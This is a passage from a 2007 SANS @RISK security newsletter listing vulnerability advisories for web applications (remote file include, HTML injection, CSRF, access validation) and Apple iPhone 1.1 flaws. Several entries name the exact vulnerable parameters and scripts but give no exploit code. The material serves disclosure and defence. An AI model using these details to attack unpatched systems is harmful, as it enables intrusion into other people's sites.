  • Description: Iletisim Formu is an ASP-based form for posting messages. The application is exposed to multiple HTML injection issues because the application fails to properly sanitize user-supplied input in "Login.asp" or "iletisim.asp" script. Iletisim Formu version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25874
  • 07.41.60 - CVE: Not Available
  • Platform: Web Application
  • Title: AlstraSoft Affiliate Network Pro Multiple Access Validation Vulnerabilities
  • Description: AlstraSoft Affiliate Network Pro is exposed to multiple access validation issues. The application fails to restrict access to the following administrative scripts: "/admin/backupstart.php" and "/admin/downloadbackup.phphttp://site/path/admin/backupstart.php". Affiliate Network Pro version 8.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25882
  • 07.41.61 - CVE: Not Available
  • Platform: Web Application
  • Title: XOOPS Uploader Class Arbitrary File Upload
  • Description: XOOPS is a PHP-based content manager. The application is exposed to an arbitrary file upload issue because it fails to sufficiently sanitize user-supplied input. The issue is due to an unspecified error in the XOOPS uploader class.
  • Ref: http://www.xoops.org/modules/news/article.php?storyid=3963
  • 07.41.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Ilient SysAid Cross-Site Request Forgery
  • Description: SysAid is a web-based helpdesk application implemented in JSP for Tomcat. The application is exposed to a cross-site forgery issue. Exploiting this issue may allow a remote attacker to use a victim's currently active session to perform actions with the application. SysAid versions 4.5.03 and 4.5.04 are affected.
  • Ref: http://www.securityfocus.com/bid/25885
  • 07.41.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Quicksilver Forums Information Disclosure Vulnerability and PM Deletion
  • Description: Quicksilver Forums is a web-based forum application. The application is exposed to multiple remote issues which include an information disclosure issue that occurs in the error reporting library and an issue that permits an attacker to delete other user's PM's. Quicksilver versions prior to 1.4.1 are affected.
  • Ref: http://www.securityfocus.com/bid/25887
  • 07.41.64 - CVE: Not Available
  • Platform: Web Application
  • Title: Segue CMS themesdir Parameter Remote File Include
  • Description: Segue CMS is a web-based content management system. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input before using it in a PHP "include()" function call. Specifically, input to the "themesdir" parameter of "index.php" isn't properly sanitized. Segue CMS version 1.8.4 is affected.
  • Ref: http://www.securityfocus.com/bid/25889
  • 07.41.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Poppawid ChildWindow.Inc.PHP Remote File Include
  • Description: Poppawid is a PHP-based webmail client. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "form" parameter of the "/mail/childwindow.inc.php" script. Poppawid version 2.7 is affected.
  • Ref: http://www.securityfocus.com/bid/25897
  • 07.41.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Content Builder postComment.php Remote File Include
  • Description: Content Builder is a PHP-based news and article management application. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "path[cb]" parameter of the "postComment.php" script. Content Builder version 0.7.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481435
  • 07.41.67 - CVE: Not Available
  • Platform: Web Application
  • Title: Ossigeno CMS Footer.PHP Remote File Include
  • Description: Ossigeno CMS is a web-based content manager. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input before using it in a PHP "include()" function call. Specifically, input to the "level" parameter of "upload/common/footer.php" isn't properly sanitized. CMS version 2.2_alpha3 is affected.
  • Ref: http://www.securityfocus.com/bid/25924
  • 07.41.68 - CVE: Not Available
  • Platform: Web Application
  • Title: Cart32 GetImage Arbitrary File Download
  • Description: Cart32 is a web-based content manager. The application is exposed to an arbitrary file download issue because it fails to sufficiently sanitize user-supplied input to the "ImageName" parameter of the "GetImage" script. Cart32 version 6.3 is affected.
  • Ref: http://www.securityfocus.com/bid/25928
  • 07.41.69 - CVE: Not Available
  • Platform: Web Application
  • Title: Blackboard Learning System ComposeMessage.JSP Multiple HTML Injection Vulnerabilities
  • Description: Blackboard Learning System is software for online teaching. The application is exposed to multiple HTML injection issues because the software fails to properly sanitize user-supplied input before using it in dynamically generated content. Specifically, it fails to properly sanitize user-supplied input to the "subject_t" and "body_text" parameters of the "messaging/course/composeMessage.jsp" script. Blackboard Learning System version 6.3.1.593 and Blackboard Learning and Community Portal System version 6.3.1.593 are affected.
  • Ref: http://trew.icenetx.net/toolz/advisory-blackboard-messages-en.txt
  • 07.41.70 - CVE: Not Available
  • Platform: Web Application
  • Title: Trionic Cite CMS BFIELD[BF_DATA] Parameter Multiple Remote File Include Vulnerabilities
  • Description: Trionic Cite CMS is a web-based content manager. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "bField[bf_data]" parameter of the following scripts: "/interface/editors/custom.php'" and "/interface/editors/-custom.php". Trionic Cite CMS version 1.2 rev9 is affected.
  • Ref: http://www.securityfocus.com/bid/25933
  • 07.41.71 - CVE: CVE-2007-4671
  • Platform: Network Device
  • Title: Apple iPhone Safari Browser Same Domain Content Manipulation
  • Description: Apple iPhone Safari browser is exposed to an issue regarding content between HTTP and HTTPS pages served from the same domain. This issue allows arbitrary JavaScript content that is served over HTTP to access other content in the same domain that is served over HTTPS. An attacker can exploit this issue to execute arbitrary script code in the context of the HTTPS web pages. Apple iPhone Safari browser versions prior to iPhone 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.72 - CVE: CVE-2007-3760
  • Platform: Network Device
  • Title: Apple iPhone 1.1.1 Mobile Safari Browser Same Origin Policy Bypass
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The application is exposed to an issue that lets attackers bypass the same-origin policy. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.73 - CVE: CVE-2007-3759
  • Platform: Network Device
  • Title: Apple iPhone Mobile Safari Browser JavaScript Execution Weakness
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The Mobile Safari browser is exposed to a weakness while disabling JavaScript. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.74 - CVE: CVE-2007-3753
  • Platform: Network Device
  • Title: Apple iPhone Bluetooth Arbitrary Code Execution
  • Description: Apple iPhone is a mobile phone. A remote code execution issue affects the iPhone Bluetooth server because it fails to adequately sanitize user-supplied data in specially crafted Service Discovery Protocol (SDP) packets. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.75 - CVE: CVE-2007-3758
  • Platform: Network Device
  • Title: Apple iPhone Mobile Safari Browser Window Properties Same Origin Policy Bypass
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The application is exposed to an issue that allows attackers to bypass the same-origin policy. iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.76 - CVE: CVE-2007-3761
  • Platform: Network Device
  • Title: Apple iPhone Safari Browser Frame Events Same-Origin Policy Bypass
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The application is exposed to an issue that lets attackers bypass the same-origin policy. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.77 - CVE: CVE-2007-3757
  • Platform: Network Device
  • Title: Apple iPhone Unauthorized tel: Initiation
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. It is exposed to an issue that results in the unintentional dialing of a telephone number that affects the iPhone Safari browser. The application allows calls to be made via "tel:" URIs. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.78 - CVE: CVE-2007-3754
  • Platform: Network Device
  • Title: Apple iPhone 1.1.1 Mail Information Disclosure
  • Description: Apple iPhone Mail is exposed to an information disclosure issue that occurs when the application is configured to use SSL for incoming and outgoing connections. The application fails to notify the user when the connected mail server changes or can no longer be trusted. This occurs because the application fails to check if the X.509 certificate has changed or has become invalid. Apple iPhone Mail versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.79 - CVE: CVE-2007-3756
  • Platform: Network Device
  • Title: Apple iPhone Mobile Safari Cross-Domain URI Disclosure
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. This issue allows an attacker to obtain the contents of an unrelated URI from a different domain. iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.80 - CVE: CVE-2007-3755
  • Platform: Network Device
  • Title: Apple iPhone Mail Unauthorized tel: Initiation
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Mail. iPhone runs on the ARM architecture. The application is exposed to an issue that results in the unintentional dialing of a telephone number or the dialing of an unexpected number. The application allows calls to be made via "tel:" URIs. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586
  • 07.41.81 - CVE: Not Available
  • Platform: Network Device
  • Title: Arbor Networks Peakflow SP Unspecified Access Control Bypass
  • Description: Peakflow SP is a network management appliance targeted to network service providers. The application is exposed to an access bypass issue due to an unspecified error. Peakflow SP versions 3.5.1 and 3.6.1 are affected.
  • Ref: http://www.securityfocus.com/bid/25907

(c) 2007. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

I have no idea how I was doing my job without this information.
-Jonathon Turner, Paycom Payroll

Securing the Internet of Things - San Francisco

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"The amount of knowledge conveyed and technical diving by practical hands-on was well balanced."
- Aaron Moore, Maricopa County

"SANS always provides you what you need to become a better security professional at the right price."
- Rasik Vekaria, BP

"Expertise of the trainer is impressive, real life situations explained, very good manuals. Best training ever!"
- Jerry Robles de Medina, Godo CU